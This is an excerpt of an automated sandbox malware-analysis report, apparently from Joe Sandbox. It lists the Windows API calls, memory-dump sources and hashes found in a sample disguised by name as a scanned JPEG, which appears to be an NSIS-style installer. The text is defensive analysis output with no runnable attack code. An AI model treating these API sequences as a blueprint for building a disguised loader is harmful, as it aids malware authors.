                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: ItemTextlstrlenwsprintf
                                  • String ID: %u.%u%s%s
                                  • API String ID: 3540041739-3551169577
                                  • Opcode ID: 1cf69ea9c1935000c011369af6ecdd87187f962970d1aa2f375690928522d96a
                                  • Instruction ID: 0ac14a548df83272d562d6c5522d93b353c1d491cf82d9c84c752126d1ac48ba
                                  • Opcode Fuzzy Hash: 1cf69ea9c1935000c011369af6ecdd87187f962970d1aa2f375690928522d96a
                                  • Instruction Fuzzy Hash: 2A11D573A041243BDB0065A99C45EAF3288DB85374F254637FE25F71D2EA78CC1285A8
                                  APIs
                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: MessageSend$Timeout
                                  • String ID: !
                                  • API String ID: 1777923405-2657877971
                                  • Opcode ID: 5c5cc43d9ea2f1c4f8babb9c5b306aab98c19b0d16ecc4efa158615eb64d646c
                                  • Instruction ID: 3953527ca16890ec8ab59ce35194567eea46ff7bd29c8182c04533b3460f2dbd
                                  • Opcode Fuzzy Hash: 5c5cc43d9ea2f1c4f8babb9c5b306aab98c19b0d16ecc4efa158615eb64d646c
                                  • Instruction Fuzzy Hash: 0C21A2B1E44209BEEF15DFA5D986AAD7BB4EF84304F24843EF501B61D0CB7886418F28
                                  APIs
                                  • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 0040202E
                                    • Part of subcall function 00405091: lstrlenA.KERNEL32(0041F4E8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000,?), ref: 004050CA
                                    • Part of subcall function 00405091: lstrlenA.KERNEL32(004030CC,0041F4E8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000), ref: 004050DA
                                    • Part of subcall function 00405091: lstrcatA.KERNEL32(0041F4E8,004030CC,004030CC,0041F4E8,00000000,?,00000000), ref: 004050ED
                                    • Part of subcall function 00405091: SetWindowTextA.USER32(0041F4E8,0041F4E8), ref: 004050FF
                                    • Part of subcall function 00405091: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405125
                                    • Part of subcall function 00405091: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513F
                                    • Part of subcall function 00405091: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040514D
                                  • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040203E
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040204E
                                  • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B8
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                  • String ID:
                                  • API String ID: 2987980305-0
                                  • Opcode ID: 56ae3f35ee98f0e8af679ca636a053002c9d71c4b06210d01490db08ae71d63a
                                  • Instruction ID: fd60b9c6cfc4bddbe94fc7e5a8503348695d94644a3847b69ed94d97695b539d
                                  • Opcode Fuzzy Hash: 56ae3f35ee98f0e8af679ca636a053002c9d71c4b06210d01490db08ae71d63a
                                  • Instruction Fuzzy Hash: BC21C971A00215BBCF207FA48E49BAE75B0AB54359F20413BF601B22D0C6BD4A42D66E
                                  APIs
                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C32
                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C3B
                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C5C
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Close$Enum
                                  • String ID:
                                  • API String ID: 464197530-0
                                  • Opcode ID: 3334b5ba8839b6b08f8d1b22820b7a27cd9b98a0074514e5335d38f885d40b59
                                  • Instruction ID: 3f870e478545c218cbf8d1d8c83e1046b3ec80cd8b5b23ff6fd5b08b87a912e1
                                  • Opcode Fuzzy Hash: 3334b5ba8839b6b08f8d1b22820b7a27cd9b98a0074514e5335d38f885d40b59
                                  • Instruction Fuzzy Hash: 76112B36504109FBEF129F91CE09F9E7B69AB48340F104072BE05B51E0E7B5AE11ABA9
                                  APIs
                                  • DestroyWindow.USER32(?,00000000,00402EDF,00000001), ref: 00402D12
                                  • GetTickCount.KERNEL32 ref: 00402D30
                                  • CreateDialogParamA.USER32(0000006F,00000000,00402C7C,00000000), ref: 00402D4D
                                  • ShowWindow.USER32(00000000,00000005), ref: 00402D5B
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                  • String ID:
                                  • API String ID: 2102729457-0
                                  • Opcode ID: 10c80b0613a78b839ad02c7969bec3604bf4f1206715e27e9f15991f3fdd17a2
                                  • Instruction ID: f5aaf9fad63db9690dbd9b3812727a8d708a0014de572c02bbf4379bbf317f26
                                  • Opcode Fuzzy Hash: 10c80b0613a78b839ad02c7969bec3604bf4f1206715e27e9f15991f3fdd17a2
                                  • Instruction Fuzzy Hash: 42F05E70906220ABCA217F64FE4CACB7BA4FB45B527014576F145B11E4C3799C8ACBDD
                                  APIs
                                  • IsWindowVisible.USER32(?), ref: 00405034
                                  • CallWindowProcA.USER32(?,?,?,?), ref: 00405085
                                    • Part of subcall function 00404055: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00404067
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: Window$CallMessageProcSendVisible
                                  • String ID:
                                  • API String ID: 3748168415-3916222277
                                  • Opcode ID: 3aee37f21ff99dc198a5fd33356f68d884607a106991554e7d1ecd4dd831c2ab
                                  • Instruction ID: 5be162d7cd7d71c2ccb341d7130f59d8c0266776e22eb2788f3d6f03133d665e
                                  • Opcode Fuzzy Hash: 3aee37f21ff99dc198a5fd33356f68d884607a106991554e7d1ecd4dd831c2ab
                                  • Instruction Fuzzy Hash: 2D019A7150060DABDF209F20DC80EAF3A25EB80354F204036FA14792D0C73A8891AEAA
                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00405B46
                                  • GetTempFileNameA.KERNEL32(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B60
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: CountFileNameTempTick
                                  • String ID: nsa
                                  • API String ID: 1716503409-2209301699
                                  • Opcode ID: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
                                  • Instruction ID: 47ad9e4c3b070603f63866c15a94f77f10573a77d4085d28ed577f0a2abf86d9
                                  • Opcode Fuzzy Hash: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
                                  • Instruction Fuzzy Hash: FFF089367082086BD7104F55DC04B9B7BA8DF91750F10803BFA049A191D6B4B9548B59
                                  APIs
                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 00405632
                                  • CloseHandle.KERNEL32(?), ref: 0040563F
                                  Strings
                                  • Error launching installer, xrefs: 0040561C
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: CloseCreateHandleProcess
                                  • String ID: Error launching installer
                                  • API String ID: 3712363035-66219284
                                  • Opcode ID: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
                                  • Instruction ID: 9728a5d5e843408a2f651da6c1778568bac2657747ba6051cf584ee7dfff0d45
                                  • Opcode Fuzzy Hash: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
                                  • Instruction Fuzzy Hash: B0E046F0A00209BFEB009B60EC09F7B7AACEB10748F404861BD11F32A0E374A9108A79
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b2818476e1d6469588ef8d75e2f77556e52d803f704a1a77dfe7aba4081c4173
                                  • Instruction ID: ffc4466fd7e1a84d1c0fc4b16d1a76bfc4ed23806840a2aa82a83de6544419ef
                                  • Opcode Fuzzy Hash: b2818476e1d6469588ef8d75e2f77556e52d803f704a1a77dfe7aba4081c4173
                                  • Instruction Fuzzy Hash: D6A15371E00229DBDF28CFA8C8547ADBBB1FF44305F15802AD856BB281C7789A96DF44
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 56f2a3a3000d6c7273ab2248f4ff10f601781423d0ca2bb331c25efff9829afe
                                  • Instruction ID: 3b3aa2dd6ba4133719dd3176c6350ec32f9f513342808bce88e7bfcf8f6a0710
                                  • Opcode Fuzzy Hash: 56f2a3a3000d6c7273ab2248f4ff10f601781423d0ca2bb331c25efff9829afe
                                  • Instruction Fuzzy Hash: F4913370E00229DBDF28CF98C8587ADBBB1FF44305F15802AD852BB291C7789A96DF44
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7fc8b0fe229dbff43726b3aa98382c4509895189392f9f8db1d3ee082f796570
                                  • Instruction ID: 583e61d198cc77022754fa770bf55cdcc509db116518bb017f27c6a68360c261
                                  • Opcode Fuzzy Hash: 7fc8b0fe229dbff43726b3aa98382c4509895189392f9f8db1d3ee082f796570
                                  • Instruction Fuzzy Hash: B9814471D04229DBDF24CFA8C884BADBBB1FF44305F25816AD446BB281C7389A96DF54
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 27bf3f2d71280db305e6514bcdeee96470c11e7b3e186f58d433be2447d111a6
                                  • Instruction ID: 20cbf149701654aecfc40dff313aa48f1da8dd35a22a44c357500b5e58bb095b
                                  • Opcode Fuzzy Hash: 27bf3f2d71280db305e6514bcdeee96470c11e7b3e186f58d433be2447d111a6
                                  • Instruction Fuzzy Hash: 1B816571D04229DBDF28CFA8C844BADBBB0FF44305F21816AD856BB281C7785A96DF54
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f7de7d62d5bd7f5964df27a39736f706d5b0cb98cf3e46e90e0dfc1ab4ed8f1c
                                  • Instruction ID: 803a34037b0f7f5be0b8e0f61a876c36f0b5510bb0b2ab0f73e67388892f039f
                                  • Opcode Fuzzy Hash: f7de7d62d5bd7f5964df27a39736f706d5b0cb98cf3e46e90e0dfc1ab4ed8f1c
                                  • Instruction Fuzzy Hash: 95710471D04229DBDF24CFA8C8447ADBBB1FB44305F15806AD846BB281D7385A96DF54
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8e17704cfcf72c8df979941797e4b0b3defb04d6abbfe177bdd58f92bded9ed7
                                  • Instruction ID: ad71f402e4a9b92a37c553ea73d368b4d72ad24497358f0b079e3127edd250f9
                                  • Opcode Fuzzy Hash: 8e17704cfcf72c8df979941797e4b0b3defb04d6abbfe177bdd58f92bded9ed7
                                  • Instruction Fuzzy Hash: 5D713571D04229DBDF28CF98C844BADBBB1FF44305F15806AD856BB281C7389A96DF54
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 721cf2a7e84b7ceee3b40c5675287f3d3981b6f25cb9f163efdac731e148116f
                                  • Instruction ID: 5c7df32a9af3fd0bcd177ef93077855236352ac101eaea0ca8dc2b1de7da3dc3
                                  • Opcode Fuzzy Hash: 721cf2a7e84b7ceee3b40c5675287f3d3981b6f25cb9f163efdac731e148116f
                                  • Instruction Fuzzy Hash: B5715571D04229DBEF28CF98C844BADBBB1FF44305F15806AD842BB281C7389A96DF44
                                  APIs
                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CC3,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A78
                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405A90
                                  • CharNextA.USER32(00000000,?,00000000,00405CC3,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AA1
                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405CC3,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAA
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd
                                  Similarity
                                  • API ID: lstrlen$CharNextlstrcmpi
                                  • String ID:
                                  • API String ID: 190613189-0
                                  • Opcode ID: 57b21f4120e00b08a3941e9ed4e610408d9ca53935617fe6296070accebd3829
